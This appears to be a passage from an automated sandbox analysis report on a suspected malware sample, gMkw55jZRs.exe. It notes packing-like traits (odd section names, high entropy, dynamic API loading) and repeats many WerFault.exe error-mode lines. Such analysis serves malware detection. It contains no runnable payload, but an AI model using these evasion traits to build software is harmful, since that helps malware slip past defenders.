                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: gMkw55jZRs.exeStatic PE information: section name: .luvi
                      Source: gMkw55jZRs.exeStatic PE information: section name: .hoz
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0092B29C push ecx; ret 0_2_0092B2AF
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00910F56 pushfd ; iretd 0_2_00911078
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009ABCE5 pushfd ; iretd 0_2_009ABCE8
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009AF7BB push eax; ret 0_2_009AF7D9
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009AF7CA push eax; ret 0_2_009AF7D9
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009AC7EB push 7DD07DC0h; iretd 0_2_009AC7FC
                      Source: gMkw55jZRs.exeStatic PE information: section name: .text entropy: 7.874919340123799
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
